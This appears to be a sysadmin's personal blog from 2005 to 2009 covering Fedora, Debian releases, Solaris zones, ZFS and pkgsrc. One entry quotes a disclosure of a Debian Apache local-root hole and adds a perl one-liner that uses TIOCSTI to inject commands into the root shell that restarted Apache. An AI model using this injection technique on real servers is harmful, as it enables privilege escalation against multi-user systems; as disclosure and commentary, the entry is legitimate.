"That which is overdesigned, too highly specific, anticipates outcome; the anticipation of outcome guarantees, if not failure, the absence of grace."
-- William Gibson, All Tomorrow's Parties
January 26, 2005

Harry bitched at me for making that Red Hat joke the other day, so just to be an ass I went ahead and downloaded the Fedora Core 3 ISOs. Finally got around to installing it on a machine today:

Dual P3 900-something, 512MB RAM, SCSI, Ensoniq something or other, NVidia something, Intel EEPro.

It's a Penguin Computing workstation, so all the parts are pretty much guaranteed to work, or they're bad.

Anyway, it booted, saw stuff, installed.

So far it's not awful. I went with the Workstation install, just to screw with it, since it's just a toy to me. The up2date tool is nice, and the fact that it's in the menubar at launch is good stuff. I pulled about 130MB of updates just now and it's installing.

Netfilter defaults to on, as does SELinux, so there's actual Workstation Security stuff going on, which is pretty awesome.
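
If you want to see it for yourself, a couple of quick checks from a root shell (paths from memory of a stock FC3 install, so consider this a sketch):

/usr/sbin/getenforce             # should report "Enforcing", if memory serves
/sbin/iptables -L -n             # the default netfilter ruleset
/sbin/chkconfig --list iptables  # and it's set to come up at boot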

GNOME 2.8 is fast. The menu layout still sucks. After using OS X for the past two years, I'm not used to wading through menus to get at things anymore, especially not for simple configuration/preferences. There should be some sort of central location for that stuff. (Is there? gconf doesn't count.)

The keychain icon in the toolbar when you auth to root is good stuff as well.

Overall, thus far, I would say it's a pretty good product.

That said, some people have run into problems with the install or various other things. Perhaps I'll hit those, but probably not before I install something else on the machine. :)

It should also be noted that the Windows Browser thing is still broken. I've never seen a distro where it actually does work, though, so you can't really hold it against RH (I guess).

I had initially intended to get some RH server action going and do a real review of how it stood up against other server OSes (Sol10, OpenBSD, etc), but obviously I can't get at the RH Enterprise bits, and reviewing FC3:Server against those just doesn't seem fair.

I would recommend it to someone who just wants a workstation, anyway.

February 26, 2007

[Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)

Version 1.3.34-4 of Apache in the Debian Linux distribution contains a hole that allows a local user to access a root shell if the webserver has been restarted manually. This bug does not exist in the upstream apache distribution, and was patched in specifically by the Debian distribution. The bug report is located at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of writing (over a month since the root hole was clarified), there has been no official acknowledgement. It is believed that most of the developers are tied up in more urgent work, getting the TI-86 distribution of Debian building in time for release.

Unlike every other daemon, apache does not abdicate its controlling tty on startup, and allows it to be inherited by a cgi script (for example, a local user's CGI executed using suexec). When apache is manually restarted, the inherited ctty is the stdin of the (presumably root) shell that invoked the new instance of apache. Any process is permitted to invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows it to inject characters that appear to come from the terminal master. Thus, a user created CGI script can inject and have executed any input into the shell that spawned apache.

As a Debian user, this concerns me greatly, as any non-privileged user would be able to install non-free documentation (GFDL) on any system I run.

Richard
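
If the TIOCSTI bit isn't obvious, the primitive really is that small. A sketch of the idea only, not Richard's PoC; 0x5412 is TIOCSTI on Linux/x86, and the injected command is made up:

# Sketch only: a CGI that inherited apache's ctty pushes bytes onto that tty,
# and they show up as input to the root shell that restarted apache.
# 0x5412 is TIOCSTI on Linux/x86; the command being injected is obviously made up.
perl -e 'open(T, "<", "/dev/tty") or die $!; ioctl(T, 0x5412, $_) for split //, "id > /tmp/owned\n";'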

April 8, 2007

Well, it looks like Debian 4.0 (Etch) has been released. And they have a new project leader. And they're talking about trying to get releases out every two years.


* bda peeks out the window, looking for amphibian precipitation or airborne porcine.

The whole dunc-tank thing was, in a lot of ways, the final straw for me. Not the fact that some Debian leads and devs got paid for their work. Who cares, as long as they were doing the work? No, the fact that a bunch of essentially commie programmers jumped ship from the leading commie Linux distro to work on Ubuntu, which is pretty damn far from the Debian project's ideals (regardless of the noise Ubuntu people make).

But when it all comes down to it, I don't care about this crap anymore. I don't care that an OpenBSD dev goofed up and committed GPL'd code to the public CVS repo, I don't care that there was a huge flame-out on linux-wireless@, I don't care about ridiculous community in-fighting.

At the end of the day I want two things:

  • Something that works
  • Something with a stable release cycle

Maybe Debian can get there again, though as Ian Murdock recently said during one of his interviews about being hired at Sun, Debian is all about the process these days. And their process is broken.

April 12, 2007

While I was at the colo tonight doing other stuff, I installed Debian 4.0 on one of our SuperMicros (older rev SATA cards which aren't supported by Solaris). The install was relatively painless. I got my metadisks and volumes set up with ease, it didn't ask any stupid questions, and there wasn't any post-install setup.

I chose the "standard" install, as I didn't want www, mx, or anything else going on. I just wanted the standard base Debian install I've been used to for the last ten years. The system gets to a login prompt, I unplug the display, and go back to my other tasks.

When I finally get home, I log into the... wait. What?

[bda@selene]:[~]$ ssh root@moon
ssh: connect to host moon port 22: Connection refused

I... What?

So I think to myself: Maybe I am crazy. Maybe there were some post-install setup questions and I just wasn't paying attention. After a quick install into a Parallels virtual machine, it's quite apparent that, at least in this particular context, I am not insane.

No OpenSSH by default in Debian 4.0.

But hey, nfs-common, portmap, and inetd are all running! So ... that's something.
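
The fix is a one-liner at the console, assuming you haven't already left the colo:

aptitude install openssh-server   # or apt-get install openssh-server; either way, not something I should have to do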

It's like Debian is saying "We need to be more like Ubuntu. How can we do that? Hey, they don't ship with sshd by default, let's do that!"

This is a load of bollocks. It's an incredibly basic policy change (one I've relied on for as long as I've used Debian -- ten fucking years!) and it wasn't mentioned in any of the fucking release notes or announcements.

This is total bullshit.

April 26, 2007

Let it be known that I am not a fan of reiserfs. It has screwed me over too many times at all hours, forced me to sit around while it fscks repeatedly just to get anywhere, yadda yadda...

So when people start talking about why reiser4 isn't in the Linux kernel yet I just have to grunt and go back to working on getting all our stuff on Solaris.

And, the bastion of hilarious insanity that it is, the first comment on osnews?

Am I the only one who feels that Linux *badly* needs a new filesystem, and that is a shame that Reiser4, having been declared stable years ago, isn't still being officially supported?

When I saw that SUSE had dropped Reiserfs (3) as its default filesystem I had the shock of my life.

Reminds me of those birds from Mostly Harmless. The ones who were like flying goldfish: Constantly surprised by the most inane things.

October 15, 2007

Based on Albert Lee's howto:


[20071015-08:38:52]:[root@clamour]:[~]# uname -a
SunOS clamour 5.10 Generic_120012-14 i86pc i386 i86pc
[20071015-08:38:53]:[root@clamour]:[~]# zoneadm list -cv
  ID NAME      STATUS     PATH                     BRAND    IP
   0 global    running    /                        native   shared
   3 control   running    /export/zones/control    native   shared
   4 lunix     running    /export/zones/lunix      lx       shared
[20071015-08:38:56]:[root@clamour]:[~]# zlogin lunix
[Connected to zone 'lunix' pts/5]
Last login: Mon Oct 15 12:37:28 2007 from zone:global on pts/4
Linux lunix 2.4.21 BrandZ fake linux i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lunix:~#

After I stop laughing hysterically, visions of collapsing Linux boxes into Solaris zones dancing through my twitching little mind, I'll have to see how twitchy the install itself is. Already it appears that some stuff is unhappy, though most of it seems to revolve around things that don't matter (ICMP oddities, console oddities wrt determining how smart it is about restarting services -sigh- and a few other easily surmountable or ignorable things).

Overall: Hello, awesome.
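
For reference, the zone setup itself is only a handful of commands. This is a sketch from memory rather than Albert's actual howto; the Debian image tarball is a made-up path, and getting an image BrandZ will accept is exactly the part the howto exists for:

# Sketch: lx branded zone on Solaris 10. The tarball path is hypothetical.
zonecfg -z lunix "create -t SUNWlx; set zonepath=/export/zones/lunix; commit"
zoneadm -z lunix install -d /path/to/debian-image.tar.gz
zoneadm -z lunix boot
zlogin lunix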

(Update: It appears that 6591535 makes this a non-starter. I am now, again, a very sad bda with a bunch of crappy hardware and nowhere to move their services to.)

March 1, 2009

Over the last two weeks we (read: rjbs) migrated our Subversion repositories to git on GitHub. I was not very pleased with this for the first week or so. By default, I am grumpy when things that (to me) are working just fine are changed, especially at an (even minor) inconvenience to me. That is just the grumpy, beardy sysadmin in me.

After a bit more of a talking-to from rjbs, things are again smooth sailing. I can do the small amount of VCS work I need to do, and more importantly: I am assured things I don't care about will make the developers' lives much, much less painful, which is something I am certainly all for.

git is much faster than Subversion ever was, and I can see some features as being useful to me eventually. Overall, though, what I use VCS for is pretty uninteresting, so I don't have much else to say about it.

I had a couple basic mental blocks that rjbs was able to explain away in a 20 minute talk he gave during our bi-weekly iteration meeting. It was quite productive. There are pictures.

Work has otherwise consisted of a lot of consolidation. I have finally reduced the number of horrible systems to two. Yes. Two. Both of which are slated for destruction in the next iteration. Not only that, I have found some poor sucker (hi, Cronin!) to take them all off our hands. Of course, they'll be upgrading from PIIIs, so...

I also cleaned up our racks. A lot. They are almost clean enough to post pictures of, though I'll wait until I've used up more of the six rolls of velcro Matt ordered before doing that.

Pretty soon we'll have nothing but Sun, a bit of IBM, and a very small number of SuperMicros. My plan is to move our mail storage from the existing SCSI arrays to a Sun J4200 (hopefully arriving this coming week). 6TB raw disk, and it eats 3.5" SATA disks, which are ridiculously cheap these days. I really, really wanted an Amber Road (aka OpenStorage) 7110, but at 2TB with the cost of 2.5" SAS, it was impossible to justify. If they sold a SATA version at the low-end... there has been some noise about conversion kits for Thumpers, but that's also way outside our price range.

I doubt conversion support will become more common, but if I could turn one of our X4100s and the J4200 into an OpenStorage setup, I would be incredibly happy. If you haven't tried out the OpenStorage Simulator, I suggest you do so. Analytics is absolutely amazing.

People on zfs-discuss@ and #opensolaris have been talking about possible GSoC projects. I suggested a zpool/filesystem "interactive" attribute, or "ask before destroy." However you want to think of it. Someone else expanded on that, suggesting that -t be allowed to ensure that only specified resource types can be destroyed. I have yet to bone myself with a `zfs destroy` or `zpool destroy` but the day will come, and I will cry.
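
To be clear, none of this syntax exists today; it's just the hypothetical usage I have in my head:

# hypothetical "ask before destroy" property:
zfs set interactive=on tank/mail
zfs destroy tank/mail
#   really destroy tank/mail? [y/N]
# the suggested -t expansion: refuse unless the target is of the given type
zfs destroy -t snapshot tank/mail@2009-03-01   # fine, it's a snapshot
zfs destroy -t snapshot tank/mail              # error: not a snapshot, nothing destroyed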

I see a pkgsrc upgrade in my near future. I've been working on linking all our Perl modules against it, and I want to get the rest of our internal code linking against it as well. It will make OS upgrades so, so much easier. Right now, most code is either linked to OS libraries or to an internal tree (most of which also links to OS libraries).

We've almost gotten rid of all our Debian 3.1 installs, which is... well. You know. Debian 5.0 just came out, and we've barely gotten moved to 4.0 yet. Getting the upgrade path there sorted out will thankfully just be tedious, and require nothing clever.

I really hope that the Cobbler guys get Debian partitioning down soon, and integrate some Solaris support. I tried redeploying FAI over Christmas and man, did it so not work out of the box. I used to use FAI, and was quite happy with it. I had to hack it up, but... it worked pretty well. Until it stopped.

If Cobbler had Solaris support, I would seriously consider moving our remaining Linux installs to CentOS. We use puppet already, so in many ways Cobbler is a no-brainer. We are not really tied to any particular Linux distribution, and having all our infrastructure under a single management tool's ken would be really nice. To put it mildly.

30% curious about OpenSolaris's Automated Installer project, but it's so far off the radar as to be a ghost.

I picked up John Allspaw's The Art of Capacity Planning, and it's next on my book queue. Flipping through it makes me think it's going to be as useful as Theo S.'s Scalable Internet Architectures.

March 18, 2009

So Linux has a history of hosed db interfaces. Apache worked around this about ten years ago by including their own SDBM in their distribution.

pkgsrc separates its Apache packages into DSOs, so mod_perl, mod_fastcgi, mod_ssl, etc, are built as separate packages. However, when you compile Apache 1 with no SSL, it disables SDBM, so mod_ssl (which requires some sort of DBM) fails to build.

The PR is here.

My workaround was to do this:

ap-ssl$ bmake patch

ap-ssl$ vi /usr/pkg/pkgsrc/www/ap-ssl/work/mod_ssl-2.8.31-1.3.41/pkg.sslmod/libssl.module

Search for the first instance of APXS.

Add the following two lines above it:

APXS_MODE="yes"
my_rule_SSL_SDBM="yes"

And ap-ssl will compile happily.
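
From there it's the usual pkgsrc dance, assuming nothing else in the tree is unhappy:

ap-ssl$ bmake install clean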